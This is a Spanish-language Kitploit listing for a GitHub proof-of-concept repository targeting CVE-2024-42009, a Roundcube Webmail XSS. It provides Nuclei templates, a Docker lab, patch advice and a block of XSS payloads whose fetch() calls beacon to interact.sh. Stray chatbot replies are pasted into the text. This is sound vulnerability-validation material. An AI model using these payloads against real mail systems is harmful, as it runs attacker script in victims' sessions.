Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-42009 — Plantillas de Nuclei y laboratorio Docker para demostrar y validar CVE-2024-42009, un XSS reflejado en Roundcube Webmail, utilizando detección fuera de banda a través de Interactsh para pruebas autorizadas. | Kitploit
Herramientas/GitHubGitHub/shubhankargupta691/cve-2024-42009
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubshubhankargupta691/cve-2024-42009

CVE-2024-42009

Plantillas de Nuclei y laboratorio Docker para demostrar y validar CVE-2024-42009, un XSS reflejado en Roundcube Webmail, utilizando detección fuera de banda a través de Interactsh para pruebas autorizadas.

Ver Repositorio
4hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-42009 – XSS Reflejado en Roundcube Webmail

📌 Resumen

Este repositorio contiene una plantilla de Nuclei y recursos complementarios para demostrar y validar de forma segura CVE-2024-42009, una vulnerabilidad crítica de XSS reflejado en Roundcube Webmail. El fallo reside en la función message_body() en show.php, donde modificaciones posteriores a la sanitización provocan una desanitización y un renderizado inseguro del contenido de correo HTML manipulado.

⚠️ Este PoC está destinado únicamente a fines educativos y pruebas autorizadas. No lo utilice contra sistemas que no posea o para los que no tenga permiso explícito.


🧠 Resumen de la Vulnerabilidad

  • CVE ID: CVE-2024-42009
  • Severidad: Crítica (CVSS 9.8)
  • Versiones Afectadas: Roundcube ≤ 1.6.7 y ≤ 1.5.7
  • Versiones Parcheadas: 1.6.8 y 1.5.8
  • Componente: message_body() en show.php
  • Impacto: Ejecución arbitraria de JavaScript cuando un usuario visualiza un correo malicioso

🧪 Estrategia de Detección (Solo para Laboratorio)

Este repositorio utiliza detección Fuera de Banda (OOB) mediante Interactsh para confirmar la ejecución de JavaScript en un laboratorio controlado.

Pasos Clave:

  1. Desplegar una instancia vulnerable de Roundcube (por ejemplo, mediante Docker)
  2. Enviar un correo manipulado con una etiqueta <body> que contenga onanimationstart y un beacon a Interactsh
  3. Abrir el correo en la interfaz de Roundcube
  4. Confirmar la devolución de llamada DNS/HTTP al dominio de Interactsh

🐳 Configuración del Laboratorio

Utilice el archivo Docker Compose proporcionado para poner en marcha una instancia local de Roundcube con MailHog (sumidero SMTP) y MariaDB.

git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
cd CVE-2024-42009
docker compose up -d
  • Roundcube UI: http://localhost:8080
  • MailHog UI: http://localhost:8025
  • Método de Inicio de Sesión: Cuenta de Google

⚠️ No utilice su cuenta de Google.


📁 Contenido del Repositorio

  • CVE-2024-42009-OOB.yaml – Plantilla de Nuclei con detección Interactsh y Fuera de Banda (OOB)
  • CVE-2024-42009.yaml – Plantilla de Nuclei sin Interactsh ni OOB
  • docker-compose.yml – Configuración del entorno de laboratorio para Roundcube Webmail
  • Images/ – Capturas de pantalla que muestran accesos HTTP/DNS desde Interactsh

🎥 Demostración en Video

Este video recorre toda la cadena de explotación:

  • Creación del payload
  • Envío por correo o endpoint
  • Activación de la vulnerabilidad
  • Confirmación del beacon mediante Interactsh

(demostración en video)


Para incluir de forma responsable esos payloads XSS en tu README, deberías colocarlos en una sección claramente etiquetada con fines educativos o de pruebas. Aquí tienes una estructura sugerida:


🧪 Ejemplos de Payloads XSS (Solo para Pruebas)

⚠️ Aviso: Estos payloads están destinados únicamente a fines educativos y pruebas de seguridad autorizadas. No los implemente en sistemas sin permiso explícito.

<!-- Image tag with onerror -->
<img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">

<!-- Broken image source with onerror -->
<img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/main/x" onerror="fetch('https://interact.sh/hit')">

<!-- SVG with onload -->
<svg onload="fetch('https://interact.sh/hit')"></svg>

<!-- Script tag -->
<script>fetch('https://interact.sh/hit')</script>

<!-- JavaScript in iframe src -->

🧭 Cómo Usar

  • Reemplace https://interact.sh/hit con su propio endpoint de escucha.
  • Úselos en entornos controlados como laboratorios locales o plataformas CTF.
  • Monitoree su endpoint para detectar solicitudes entrantes y validar la ejecución.

🛡️ Mitigación

Actualice Roundcube a:

  • 1.6.8 o 1.5.8
    Estas versiones eliminan la lógica de post-procesamiento vulnerable y aplican una sanitización más estricta y cabeceras CSP.

📜 Referencias

Perfecto: aquí tienes una sección de Referencias limpia y profesional que puedes incluir en tu README o envío por correo para CVE-2024-42009. Cita todas las fuentes que has listado, formateadas para claridad y credibilidad:


📚 Referencias

  • NVD CVE Entry – CVE-2024-42009 – Listado oficial de vulnerabilidad con puntuación CVSS y versiones afectadas
  • SonarSource Blog – Government Emails at Risk – Análisis técnico en profundidad y desglose del exploit
  • GitHub PoC by DaniTheHack3r – Exploit basado en Python con listener de correo y payload activado por animación
  • GitHub PoC by Bhanunamikaze – Inyección de payload automatizada y exfiltración mediante listener HTTP
  • GitHub PoC by 0xbassiouny1337 – Exploit de XSS almacenado con captura y decodificación de correo en tiempo real

Descargar herramienta